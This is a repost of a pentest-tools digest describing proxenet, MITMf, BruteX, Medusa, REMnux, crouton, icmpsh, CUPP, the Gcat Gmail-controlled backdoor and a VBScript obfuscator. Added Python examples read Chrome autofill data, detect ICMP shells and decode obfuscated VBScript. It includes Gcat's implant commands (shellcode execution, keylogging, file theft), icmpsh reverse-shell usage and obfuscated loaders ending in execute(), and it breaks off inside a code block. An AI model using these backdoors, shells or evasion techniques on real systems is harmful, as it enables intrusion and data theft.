Channel: KitPloit - PenTest Tools!

Proxenet - Hacker Friendly Proxy for Web Application Penetration Tests


Proxenet is a hacker friendly proxy for web application penetration tests.

proxenet is a multi-threaded proxy which allows you to manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java (like for Burp) or Python (like for mitmproxy). proxenet supports heaps of languages (see the section "Language Versions") and more can be easily added.

proxenet is not script kiddie friendly, nor GUI friendly. If this is what you are looking for, here are a few links for you:
Or the best way, write your own GUI as a proxenet plugin!

Why?

The idea behind proxenet came after a lot of frustration from attempting to write extensions for Burp. Moreover, only a few of the existing proxies support adding new extensions, and when they do, they are specific to one language, despite Burp's persistent attempts to make unnatural bindings (Python over Java or, worse, Ruby over Java).

Being written in pure C, it is fast, efficient and easily pluggable to anything else. It is the ultimate real DIY web proxy for pentest(ers).

Features

Here is a sample of features already supported by proxenet:
  • Written in C
    • Fast (heavy thread use)
    • Efficient (POSIX compatible)
    • Low memory footprint (for the core)
  • Can interact with any language
  • Provides plugins support for the following languages:
    • C
    • Python
    • Lua
    • Ruby
    • Perl
    • Tcl
    • Java
  • SSL
    • Full SSL interception (internal CA)
    • SSL client certificate authentication
  • IPv4/IPv6
  • HTTP Proxy forwarding
  • White-list/Black-list hosts filtering
  • Command interface out-of-band
  • Nice TTY colors :D
  • 100% Open-Source
... and more !

The best of both worlds?

Some people might miss the beautiful interface some other GUI-friendly proxies provide. So be it! Plug proxenet as a relay behind your favorite Burp, Zap, Proxystrike, burst, etc. and enjoy the show!

How to start
$ git clone https://github.com/hugsy/proxenet.git
$ cd proxenet && cmake . && make



MITMf - Framework for Man-In-The-Middle attacks


Framework for Man-In-The-Middle attacks

Available plugins
  • SMBtrap - Exploits the 'SMB Trap' vulnerability on connected clients
  • Screenshotter - Uses HTML5 Canvas to render an accurate screenshot of a client's browser
  • Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ - Partially bypass HSTS
  • Spoof - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
  • BeEFAutorun - Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison - Perform app cache poisoning attacks
  • Ferret-NG - Transparently hijacks sessions
  • BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
  • CacheKill - Kills page caching by modifying headers
  • FilePwn - Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject - Inject arbitrary content into HTML content
  • BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
  • jskeylogger - Injects a Javascript keylogger into a client's webpages
  • Replace - Replace arbitrary content in HTML content
  • SMBAuth - Evoke SMB challenge-response authentication attempts
  • Upsidedownternet - Flips images 180 degrees

How to install on Kali
apt-get install mitmf


Installation
If MITMf is not in your distro's repo or you just want the latest version:
  • Run the command git clone https://github.com/byt3bl33d3r/MITMf.git to clone this repository
  • Run the setup.sh script
  • Run the command pip install --upgrade -r requirements.txt to install all Python dependencies

On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ImportError: no module named pcap, run apt-get install python-pypcap to fix it


BruteX - Automatically Brute Force all Services Running on a Target


Automatically brute force all services running on a target including:
  • Open ports
  • DNS domains
  • Web files
  • Web directories
  • Usernames
  • Passwords

USAGE
./brutex target

DEPENDENCIES
  • NMap
  • Hydra
  • Wfuzz
  • SNMPWalk
  • DNSDict

To brute force multiple hosts, use brutex-massscan and include the IPs/hostnames to scan in the targets.txt file.


Medusa - Speedy, Parallel and Modular Login Brute-Forcer


Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers the following items to be some of the key features of this application:
  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Why?

Why create Medusa? Isn't this the same thing as THC-Hydra? Here are some of the reasons for this application:
  • Application stability. Maybe I'm just lame, but Hydra frequently crashed on me. I was no longer confident that Hydra was actually doing what it claimed to be. Rather than fix Hydra, I decided to create my own buggy application which could crash in new and exciting ways.
  • Code organization. A while back I added several features to Hydra (parallel host scanning, SMBNT module). Retro-fitting the parallel host code to Hydra was a serious pain. This was mainly due to my coding ignorance, but was probably also due to Hydra not being designed from the ground-up to support this. Medusa was designed from the start to support parallel testing of hosts, users and passwords.
  • Speed. Hydra accomplishes its parallel testing by forking off a new process for each host and instance of the service being tested. When testing many hosts/users at once this creates a large amount of overhead as user/password lists must be duplicated for each forked process. Medusa is pthread-based and does not unnecessarily duplicate information.
  • Education. I am not an experienced C programmer, nor do I consider myself an expert in multi-threaded programming. Writing this application was a training exercise for me. Hopefully, the results of it will be useful for others. 

Module specific details:
  • AFP
  • CVS
  • FTP
  • HTTP
  • IMAP
  • MS-SQL
  • MySQL
  • NetWare NCP
  • NNTP
  • PcAnywhere
  • POP3
  • PostgreSQL
  • REXEC
  • RDP
  • RLOGIN
  • RSH
  • SMBNT
  • SMTP-AUTH
  • SMTP-VRFY
  • SNMP
  • SSHv2
  • Subversion (SVN)
  • Telnet
  • VMware Authentication Daemon (vmauthd)
  • VNC
  • Generic Wrapper
  • Web Form

News
2015-06-07: Released Medusa v2.2_rc2
2015-05-28: Released Medusa v2.2_rc1
2012-05-25: Released Medusa v2.1.1
2012-04-02: Released Medusa v2.1
2011-03-04: tak and bigmoneyhat have released a Java-based GUI for Medusa (Medusa-gui)
2010-02-09: Released Medusa v2.0


Chrome Autofill Viewer - Tool to View or Delete Autocomplete data from Google Chrome browser


Chrome Autofill Viewer is the free tool to easily see and delete all your autocomplete data from Google Chrome browser.

Chrome stores Autofill entries (typically form fields) such as login name, PIN, passwords, email, address, phone, credit/debit card number, search history etc. in an internal database file.

'Chrome Autofill Viewer' helps you to automatically find and view all the Autofill history data from the Chrome browser. For each entry, it displays the following details:
  • Field Name
  • Value
  • Total Used Count
  • First Used Date
  • Last Used Date
You can also use it to view a history file belonging to another user on the same or a remote system. It also provides a one-click solution to delete all the displayed Autofill data from the history file.

It is very simple to use, which makes it a handy tool for forensic investigators.

Chrome Autofill Viewer is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Features
  • Instantly view all the Autofill list from Chrome browser
  • On startup, it auto detects Autofill file from Chrome's default profile location
  • Sort feature to arrange the data in various orders to make it easier to search through hundreds of entries.
  • Delete all the Autofill data with just a click of button
  • Save the displayed Autofill list to HTML/XML/TEXT/CSV file
  • Easier and faster to use with its enhanced user friendly GUI interface
  • Fully Portable, does not require any third party components like JAVA, .NET etc
  • Support for local Installation and uninstallation of the software

How to Use?

Chrome Autofill Viewer is easy to use with its simple GUI interface.

Here are the brief usage details:
  • Launch ChromeAutofillViewer on your system
  • By default it will automatically find and display the autofill file from default profile location of Chrome. You can also select the desired file manually.
  • Next click on 'Show All' button and all stored Autofill data will be displayed in the list as shown in screenshot 1 below.
  • If you want to remove all the entries, click on 'Delete All' button below.
  • Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.
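The five fields the tool displays (field name, value, use count, first and last used date) map directly onto columns of the autofill table in Chrome's "Web Data" SQLite file, so the same view can be produced in a few lines of Python. The following is an added example for forensic use, not code from Chrome Autofill Viewer or its author. It assumes the autofill table carries the columns name, value, count, date_created and date_last_used with dates as Unix epoch seconds (check the schema of the Chrome version you examine), copies the database before opening the copy read-only so the original profile is never touched (relevant because the tool's own "Delete All" writes to the file), and runs against a constructed sample database built with that schema.

```python
import shutil
import sqlite3
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Column set assumed for Chrome's autofill table; verify against your target version.
QUERY = """
SELECT name, value, count, date_created, date_last_used
FROM autofill
ORDER BY count DESC, date_last_used DESC
"""


def _fmt(ts):
    """Autofill dates are assumed to be Unix epoch seconds; render as UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def read_autofill(web_data_path):
    """Copy the database, open the copy read-only, return the autofill entries.

    Working on a copy avoids the lock Chrome holds on a live profile and
    guarantees the evidence file is not modified by the examination.
    """
    with tempfile.TemporaryDirectory() as tmp:
        copy = Path(tmp) / "webdata_copy.sqlite"
        shutil.copy2(web_data_path, copy)
        con = sqlite3.connect(f"file:{copy.resolve().as_posix()}?mode=ro", uri=True)
        try:
            rows = con.execute(QUERY).fetchall()
        finally:
            con.close()
    return [
        {"field": n, "value": v, "used": c, "first_used": _fmt(dc), "last_used": _fmt(dl)}
        for n, v, c, dc, dl in rows
    ]


def sensitive_fields(entries, keywords=("pass", "pin", "card", "cvv", "ssn")):
    """Entries whose field name suggests a site let a secret land in plain autofill."""
    return [e for e in entries if any(k in e["field"].lower() for k in keywords)]


def build_sample_db(path):
    """Constructed sample with the assumed schema; not a real Chrome profile."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE autofill (
            name VARCHAR, value VARCHAR, value_lower VARCHAR,
            date_created INTEGER, date_last_used INTEGER, count INTEGER DEFAULT 1
        );
    """)
    con.executemany(
        "INSERT INTO autofill VALUES (?, ?, ?, ?, ?, ?)",
        [
            ("email", "alice@example.com", "alice@example.com", 1433808000, 1433894400, 12),
            ("username", "alice", "alice", 1433808000, 1433894400, 7),
            ("cardnumber", "4111111111111111", "4111111111111111", 1433808000, 1433808000, 1),
            ("q", "remnux cheat sheet", "remnux cheat sheet", 1433894400, 1433894400, 2),
        ],
    )
    con.commit()
    con.close()


def demo():
    """Build the constructed sample, read it back, and flag suspicious field names."""
    with tempfile.TemporaryDirectory() as d:
        sample = Path(d) / "WebData"
        build_sample_db(sample)
        entries = read_autofill(sample)
    return entries, [e["field"] for e in sensitive_fields(entries)]


if __name__ == "__main__":
    entries, flagged = demo()
    for e in entries:
        print(e)
    print("field names suggesting stored secrets:", flagged)
```

Point read_autofill at a copy of a real "Web Data" file to get the same list the GUI tool shows; the sensitive_fields pass is a quick triage for forms that captured card numbers or PINs into ordinary autofill rather than Chrome's dedicated encrypted stores.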

REMnux v6 - A Linux Toolkit for Reverse-Engineering and Analyzing Malware


REMnux is a free Linux toolkit for assisting malware analysts with reverse-engineering malicious software. It strives to make it easier for forensic investigators and incident responders to start using the variety of freely-available tools that can examine malware, yet might be difficult to locate or set up.

The heart of the project is the REMnux Linux distribution based on Ubuntu. This lightweight distro incorporates many tools for analyzing Windows and Linux malware, examining browser-based threats such as obfuscated JavaScript, exploring suspicious document files and taking apart other malicious artifacts. Investigators can also use the distro to intercept suspicious network traffic in an isolated lab when performing behavioral malware analysis.

Malware Analysis Tools Installed on REMnux

The REMnux distribution includes many free tools useful for examining malicious software. These utilities are set up and tested to make it easier for you to perform malware analysis tasks without needing to figure out how to install them. The majority of these tools are listed below.

Examine Browser Malware

Examine Document Files

Extract and Decode Artifacts

Handle Network Interactions

Process Multiple Samples

Examine File Properties and Contents

Investigate Linux Malware

Edit and View Files

Examine Memory Snapshots

Statically Examine PE Files

Investigate Mobile Malware

Perform Other Tasks

REMnux Documentation 

REMnux documentation is a relatively recent effort which provides additional details about the toolkit. The document set is in need of improvement and expansion.

The one-page REMnux cheat sheet highlights some of the most useful tools and commands available as part of the REMnux distro. It’s an especially nice starting point for people who are new to the distribution. 


Crouton - Chromium OS Universal Chroot Environment


crouton is a set of scripts that bundle up into an easy-to-use, Chromium OS-centric chroot generator. Currently Ubuntu and Debian are supported (using debootstrap behind the scenes), but "Chromium OS Debian, Ubuntu, and Probably Other Distros Eventually Chroot Environment" doesn't acronymize as well (crodupodece is admittedly pretty fun to say, though).

"crouton"...an acronym?

It stands for ChRomium Os Universal chrooT envirONment...or something like that. Do capitals really matter if caps-lock has been (mostly) banished, and the keycaps are all lower-case?
Moving on...

Who's this for?

Anyone who wants to run straight Linux on their Chromium OS device, and doesn't care about physical security. You're also better off having some knowledge of Linux tools and the command line in case things go funny, but it's not strictly necessary.

What's a chroot?

Like virtualization, chroots provide the guest OS with their own, segregated file system to run in, allowing applications to run in a different binary environment from the host OS. Unlike virtualization, you are not booting a second OS; instead, the guest OS is running using the Chromium OS system. The benefit to this is that there is zero speed penalty since everything is run natively, and you aren't wasting RAM to boot two OSes at the same time. The downside is that you must be running the correct chroot for your hardware, the software must be compatible with Chromium OS's kernel, and machine resources are inextricably tied between the host Chromium OS and the guest OS. What this means is that while the chroot cannot directly access files outside of its view, it can access all of your hardware devices, including the entire contents of memory. A root exploit in your guest OS will essentially have unfettered access to the rest of Chromium OS.
...but hey, you can run TuxRacer!

Prerequisites

You need a device running Chromium OS that has been switched to developer mode.

For instructions on how to do that, go to this Chromium OS wiki page, click on your device model and follow the steps in the Entering Developer Mode section.

Note that developer mode, in its default configuration, is completely insecure, so don't expect a password in your chroot to keep anyone from your data. crouton does support encrypting chroots, but the encryption is only as strong as the quality of your passphrase. Consider this your warning.

It's also highly recommended that you install the crouton extension, which, when combined with the extension or xiwi targets, provides much improved integration with Chromium OS.
That's it! Surprised?

Usage

crouton is a powerful tool, and there are a lot of features, but basic usage is as simple as possible by design.

If you're just here to use crouton, you can grab the latest release from https://goo.gl/fd3zc. Download it, pop open a shell (Ctrl+Alt+T, type shell and hit enter), and run sh ~/Downloads/crouton to see the help text. See the "examples" section for some usage examples.

If you're modifying crouton, you'll probably want to clone or download the repo and then either run installer/main.sh directly, or use make to build your very own crouton. You can also download the latest release, cd into the Downloads folder, and run sh crouton -x to extract out the juicy scripts contained within, but you'll be missing build-time stuff like the Makefile.

crouton uses the concept of "targets" to decide what to install. While you will have apt-get in your chroot, some targets may need minor hacks to avoid issues when running in the chrooted environment. As such, if you expect to want something that is fulfilled by a target, install that target when you make the chroot and you'll have an easier time. Don't worry if you forget to include a target; you can always update the chroot later and add it. You can see the list of available targets by running sh ~/Downloads/crouton -t help.

Once you've set up your chroot, you can easily enter it using the newly-installed enter-chroot command, or one of the target-specific start* commands. Ta-da! That was easy.

Read more here.

icmpsh - Simple Reverse ICMP Shell


Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only to known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios, when you have owned a machine that is part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, let alone a bind shell.

However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus of this tool.

Description

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run on the target machine.

The tool is clean, easy and portable. The slave (client) runs on the target Windows machine; it is written in C and works on Windows only. The master (server) can run on any platform on the attacker machine, as it has been implemented in C and Perl.

Features
  • Open source software - primarily coded by Nico, forked by me.
  • Client/server architecture.
  • The master is portable across any platform that can run either C, Perl or Python code.
  • The target system has to be Windows because the slave runs on that platform only for now.
  • The user running the slave on the target system does not require administrative privileges.

Usage

Running the master

The master is straight forward to use. There are no extra libraries required for the C and Python versions. The Perl master however has the following dependencies:
  • IO::Socket
  • NetPacket::IP
  • NetPacket::ICMP
When running the master, don't forget to disable ICMP replies by the OS. For example:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands sent from the master.

Running the slave

The slave comes with a few command line options as outlined below:
-t host          host IP address to send ping requests to. This option is mandatory!

-r               send a single test ICMP request containing the string "Test1234" and then quit. This is for testing the connection.

-d milliseconds  delay between requests in milliseconds

-o milliseconds  timeout of responses in milliseconds. If a response has not been received in time, the slave increments a counter of blanks. If that counter reaches a limit, the slave quits. The counter is reset to 0 when a response is received.

-b num           limit of blanks (unanswered ICMP requests) before quitting

-s bytes         maximal data buffer size in bytes
In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.
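The channel described above is visible on the wire: the slave's command output travels in the data portion of ICMP echo requests, so a host running it emits echo requests whose length changes from packet to packet and, with a low -d delay, far faster than a normal ping. The following is an added detection example written from the network defender's side; it is not part of icmpsh or its documentation. It assumes tcpdump-style one-line ICMP summaries (the pattern and the sample lines are constructed here), and the thresholds for request count, distinct lengths and mean inter-request gap are assumptions to tune against your own baseline.

```python
import re
from collections import defaultdict
from datetime import datetime

# One-line tcpdump-style summaries of ICMP echo requests (format assumed here;
# adapt the pattern to whatever your capture or flow tool emits).
ECHO_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): "
    r"ICMP echo request, id (?P<id>\d+), seq (?P<seq>\d+), length (?P<len>\d+)$"
)


def parse_echo_requests(lines):
    """Keep only echo requests; replies and non-ICMP lines are dropped."""
    rows = []
    for line in lines:
        m = ECHO_RE.match(line.strip())
        if m:
            rows.append({
                "ts": datetime.strptime(m["ts"], "%H:%M:%S.%f"),
                "src": m["src"],
                "dst": m["dst"],
                "length": int(m["len"]),
            })
    return rows


def find_suspect_flows(rows, min_requests=5, min_distinct_lengths=3, max_mean_gap=0.5):
    """Flag src->dst pairs whose echo requests look like a data channel, not a ping.

    Thresholds are assumptions for this example; baseline them against your own
    network before alerting on them.
    """
    flows = defaultdict(list)
    for r in rows:
        flows[(r["src"], r["dst"])].append(r)

    findings = {}
    for key, reqs in flows.items():
        if len(reqs) < min_requests:
            continue
        reqs.sort(key=lambda r: r["ts"])
        reasons = []
        lengths = {r["length"] for r in reqs}
        if len(lengths) >= min_distinct_lengths:
            reasons.append(f"{len(lengths)} distinct payload lengths (a ping keeps one)")
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        mean_gap = sum(gaps) / len(gaps)
        if mean_gap < max_mean_gap:
            reasons.append(f"mean gap between requests {mean_gap:.2f}s")
        if reasons:
            findings[key] = reasons
    return findings


def analyze_log(text, **thresholds):
    return find_suspect_flows(parse_echo_requests(text.splitlines()), **thresholds)


# Constructed sample: 10.0.0.5 is a plain once-per-second ping with a fixed length;
# 10.0.0.7 sends a request every 200 ms with a payload size that changes per packet.
SAMPLE_LOG = """\
10:00:00.000000 IP 10.0.0.5 > 10.0.0.1: ICMP echo request, id 1, seq 1, length 40
10:00:00.004000 IP 10.0.0.1 > 10.0.0.5: ICMP echo reply, id 1, seq 1, length 40
10:00:01.000000 IP 10.0.0.5 > 10.0.0.1: ICMP echo request, id 1, seq 2, length 40
10:00:02.000000 IP 10.0.0.5 > 10.0.0.1: ICMP echo request, id 1, seq 3, length 40
10:00:03.000000 IP 10.0.0.5 > 10.0.0.1: ICMP echo request, id 1, seq 4, length 40
10:00:04.000000 IP 10.0.0.5 > 10.0.0.1: ICMP echo request, id 1, seq 5, length 40
10:00:00.100000 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 2, seq 1, length 8
10:00:00.300000 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 2, seq 2, length 9
10:00:00.500000 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 2, seq 3, length 8
10:00:00.700000 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 2, seq 4, length 521
10:00:00.900000 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 2, seq 5, length 37
10:00:01.100000 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 2, seq 6, length 8
"""

if __name__ == "__main__":
    for (src, dst), reasons in analyze_log(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: " + "; ".join(reasons))
```

The two heuristics are deliberately independent: a slave configured with a long -d delay still leaks the variable-length signal, and a slave that pads every request to a fixed -s buffer still leaks the rate signal. Pair this with the sysctl note above when hunting the other end: a host that never answers echo requests with an OS-generated reply but still exchanges ICMP with one peer is worth a second look.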



Cupp - Common User Passwords Profiler


The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.

A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.

That is why CUPP was born, and it can be used in situations like legal penetration tests or forensic crime investigations.

Options
Usage: cupp.py [OPTIONS]
    -h      this menu

-i Interactive questions for user password profiling

-w Use this option to profile existing dictionary,
or WyD.pl output to make some pwnsauce :)

-l Download huge wordlists from repository

-a Parse default usernames and passwords directly from Alecto DB.
Project Alecto uses purified databases of Phenoelit and CIRT which were merged and enhanced.

-v Version of the program

Configuration
CUPP has a configuration file, cupp.cfg, with instructions.


Gcat - A stealthy Backdoor that uses Gmail as a command and control server


A stealthy Python based backdoor that uses Gmail as a command and control server.

Setup

For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • gcat.py a script that's used to enumerate and issue commands to available clients
  • implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously set up.
You're probably going to want to compile implant.py into an executable using PyInstaller

Usage
Gcat

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-id ID Client to target
-jobid JOBID Job id to retrieve

-list List available clients
-info Retrieve info on specified client

Commands:
Commands to execute on an implant

-cmd CMD Execute a system command
-download PATH Download a file from a clients system
-exec-shellcode FILE Execute supplied shellcode on a client
-screenshot Take a screenshot
-lock-screen Lock the clients screen
-force-checkin Force a check in
-start-keylogger Start keylogger
-stop-keylogger Stop keylogger
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
  • Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all; the script then outputs the jobid that we can use to retrieve the output of that command
  • Let's get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • That's the gist of it! But you can do much more as you can see from the usage of the script! ;)

VBS-Obfuscator - VBScript obfuscation to allow PenTesters bypass countermeasures


VBScript obfuscation to allow PenTesters bypass countermeasures.

Sample Script Output
C:\tools>python obfuscator.py test.vbs out.vbs
Char 109 -> 5505-5396
Char 115 -> 1113775/9685
Char 103 -> 540853/5251
Char 98 -> -2629+2727
Char 111 -> 291-180
Char 120 -> 826320/6886
Char 32 -> 118016/3688
Char 34 -> -2379+2413
Char 72 -> 2401-2329
Char 101 -> -1347+1448
Char 108 -> 759780/7035
Char 108 -> 5391-5283
Char 111 -> 743700/6700
Char 32 -> 7654-7622
Char 87 -> 636927/7321
Char 111 -> -46+157
Char 114 -> 7591-7477
Char 108 -> -9028+9136
Char 100 -> 285800/2858
Char 33 -> 5241-5208
Char 34 -> 7209-7175
Char 44 -> 234080/5320
Char 32 -> 104352/3261
Char 118 -> -3369+3487
Char 98 -> -7575+7673
Char 79 -> -9140+9219
Char 107 -> 4317-4210
Char 79 -> -5433+5512
Char 110 -> -1294+1404
Char 108 -> 6672-6564
Char 121 -> 1109-988
Char 32 -> 166080/5190
Char 43 -> 95675/2225
Char 32 -> 3156-3124
Char 118 -> -9572+9690
Char 98 -> -3093+3191
Char 73 -> 53947/739
Char 110 -> -2239+2349
Char 102 -> 554982/5441
Char 111 -> 4953-4842
Char 114 -> 907440/7960
Char 109 -> 3406-3297
Char 97 -> 3570-3473
Char 116 -> 3624-3508
Char 105 -> 137130/1306
Char 111 -> 632-521
Char 110 -> 8712-8602
Char 44 -> 94468/2147
Char 32 -> 14176/443
Char 34 -> 884/26
Char 84 -> -9768+9852
Char 104 -> -5195+5299
Char 105 -> 706335/6727
Char 115 -> 6469-6354
Char 32 -> 250304/7822
Char 105 -> -9605+9710
Char 115 -> 771190/6706
Char 32 -> -1319+1351
Char 97 -> 674053/6949
Char 32 -> -6907+6939
Char 109 -> 3365-3256
Char 101 -> 170791/1691
Char 115 -> 17020/148
Char 115 -> 3217-3102
Char 97 -> -6948+7045
Char 103 -> -9545+9648
Char 101 -> 9670-9569
Char 98 -> 926002/9449
Char 111 -> 130869/1179
Char 120 -> 255600/2130
Char 34 -> -1384+1418
Char 42 -> 1784-1742
Done!

Results (comparison)
First output
Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
SzVeVmXkoEZx = "6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*5179-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-6681+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*741684/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-6336*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*128533/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-5364*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*3171-3055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-3164+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*330840/2757*-2407+2441"
LALrsGQYjZtj = Split(SzVeVmXkoEZx, chr(eval(261366/6223)))
for each SKhxsIKQEybA in LALrsGQYjZtj
kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
next
execute(kLTOaGJfsmSG)
Second output
Dim wEQHvB, vsSBaV, pwgtko
wEQHvB = "-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938-818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+5058*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9482*347644/7901*181536/5673*198712/1684*615734/6283*779-700*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*1276-1171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-773+884*546720/4556*5235-5201"
vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
for each KxRKRt in vsSBaV
pwgtko = pwgtko & chr(eval(KxRKRt))
next
execute(pwgtko)
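Both outputs above use the same scheme: every character of the original script becomes a small arithmetic expression, the expressions are joined by a separator that is itself an expression, and the stub splits, evaluates and concatenates them before calling execute. An analyst who finds such a script can reverse it without ever running it. The following is an added example, my own and not part of VBS-Obfuscator, that does this in Python: the evaluator walks the expression's AST and accepts only integer literals with unary minus, +, -, * and /, so no eval() is involved, and decode_script pulls the Split(var, chr(eval(...))) stage and the matching string assignment out of the script text. SAMPLE_VBS is a constructed short script in the same format, with per-character expressions taken from the character table above.

```python
import ast
import operator
import re

# Only the operators the obfuscated strings use; anything else is rejected.
_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv}


def eval_arith(expr):
    """Evaluate an integer arithmetic expression such as '1113775/9685' safely."""
    tree = ast.parse(expr.strip(), mode="eval").body

    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
            return _BINOPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported construct in {expr!r}")

    value = walk(tree)
    if value != int(value):
        raise ValueError(f"{expr!r} does not evaluate to an integer")
    return int(value)


def decode_payload(encoded, separator_expr):
    """Mirror the Split / chr(eval(...)) loop of the stub, without executing anything."""
    sep = chr(eval_arith(separator_expr))
    return "".join(chr(eval_arith(part)) for part in encoded.split(sep) if part)


# Matches the stub's 'Split(<var>, chr(eval(<expr>)))' stage.
SPLIT_RE = re.compile(r"Split\(\s*(\w+)\s*,\s*chr\(eval\(([^)]+)\)\)\)", re.IGNORECASE)


def decode_script(vbs_text):
    """Locate the encoded string and its separator in an obfuscated script and decode it."""
    m = SPLIT_RE.search(vbs_text)
    if not m:
        raise ValueError("no Split(var, chr(eval(...))) stage found")
    var, sep_expr = m.group(1), m.group(2)
    assign = re.search(rf"\b{re.escape(var)}\s*=\s*\"([^\"]*)\"", vbs_text)
    if not assign:
        raise ValueError(f"no string assignment to {var} found")
    return decode_payload(assign.group(1), sep_expr)


# Constructed sample in the same format as the outputs above (not the page's own string).
SAMPLE_VBS = '''Dim qWx, LkP, Zmn
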